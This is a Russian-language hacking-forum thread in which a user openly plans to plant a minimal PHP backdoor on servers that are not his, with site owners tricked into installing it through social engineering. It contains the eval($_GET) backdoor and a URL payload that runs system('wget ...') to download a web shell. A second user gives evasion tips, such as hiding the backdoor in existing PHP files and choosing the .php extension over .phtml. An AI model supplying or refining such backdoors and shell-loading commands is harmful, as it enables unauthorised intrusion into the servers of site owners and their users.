Искусственная уязвимость в коде PHP

Discussion in 'PHP' started by RRR_RRR, 25 Dec 2017.

  1. RRR_RRR

    RRR_RRR Member

    Joined:
    20 Jun 2012
    Messages:
    396
    Likes Received:
    35
    Reputations:
    0
    Цель : создать phtml файл с минимальным кодом для дальнейшей загрузки на сервер через этот файл шелл
    Мне подсказали eval($_GET['name'])
    Через команду http://site.ru/1.phtml?name=system(“wget site.com/shell.php”) загрузка шелла на сервер
    Сам файл будет в формате phtml
    Все верно ?
     
  2. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    582
    Reputations:
    52
    Шёл 2018 год. Ещё можешь поставить расширение php4 или php5.

    [troll mode off]
    Слишком палевно. Бекдор лучше внедрять в уже существующие пхп-файлы. А если и создавать новый то расширение должно быть php а не phtml.
     
  3. RRR_RRR

    RRR_RRR Member

    Joined:
    20 Jun 2012
    Messages:
    396
    Likes Received:
    35
    Reputations:
    0
    Существующего файла нету.
    Так можно это сделать через phtml или нужно чтоб хостинг поддерживал его ?
     
  4. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    582
    Reputations:
    52
    Можно, но зависит от сервера. Если там какой-нибудь древний апач с mod_php то через htaccess.
    Если что-то современное то надо знать значение опции "Server API" из phpinfo.
     
  5. RRR_RRR

    RRR_RRR Member

    Joined:
    20 Jun 2012
    Messages:
    396
    Likes Received:
    35
    Reputations:
    0
    а есть стандартное решение ? чтоб подошел для любового сервера со стандартной настройкой
     
  6. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    582
    Reputations:
    52
    Нету. Может там IIS вообще стоит. Закидывай пхп-файл с кодом <?php phpinfo(); ?> и скидывай сюда значение Server API.
     
  7. RRR_RRR

    RRR_RRR Member

    Joined:
    20 Jun 2012
    Messages:
    396
    Likes Received:
    35
    Reputations:
    0
    сервер не мой ) цель создать почти универсальный скрипт который будет работать почти на всех обычных хостеров на базе линукс и загружать туда мои шелли
    этот файл владельцы сайтом сами будут ставить благодаря СИ
    поэтому нужно чтоб там минимальный код который я смогу спрятать
    а потом уже загрузить туда шелл для получения доступа к серверу
     
  8. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    582
    Reputations:
    52
    Если шелл должен быть универсальным то расширение должно быть php а не phtml.
    Расширение phtml устарело. Раньше (во времена пхп4, начало пхп5) оно использовалось для включения в html-страницу примитивных пхп-скриптов на несколько строк кода. Из той-же серии расширения: php4, php5

    Сейчас везде для пхп-скриптов стандарт - расширение php. Если на сервере nginx без apache то без админских прав ты никак не заставишь работать скрипт под другим расширением. А apache 2.4 по умолчанию игнорирует htaccess. Если даже тебе повезло и апач читает .htaccess то пхп у него может быть подключен разными способами: через mod_php, через php-fpm или простым cgi. И для каждой конфигурации тебе надо прописывать в .htaccess разные параметры чтобы заставить работать пхп с расширением phtml.

    В общем это неоправданный гемор.
     
    crlf likes this.
  9. RRR_RRR

    RRR_RRR Member

    Joined:
    20 Jun 2012
    Messages:
    396
    Likes Received:
    35
    Reputations:
    0
    Т.е самый оптимальный вариант это купить хостинг там где находится сайт, изучить конфигурацию и под данный сервер выбрать оптимальный вариант
     
  10. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    582
    Reputations:
    52
    Нет. Shared-хостинг уже отмирает. Сейчас в тренде vps-хостинг и железные серверы. Внутри vps-ки может быть вообще что угодно. Там может быть какая угодно панель управления: ispmanager, vestacp, plesk, cpanel, ispconfig и десятки других менее известных панелей. Толку с того что ты купишь vps у того-же хостера нет: содержимое сервера наверняка будет другим.

    Не, ну конечно если ты собрался бекдорить говносайты на дешманском шаред-хостинге за 50 рублей - может твой вариант и сработает.

    А вообще (чисто моё мнение), оптимальный вариант: не заниматься ерундой.
     
Loading...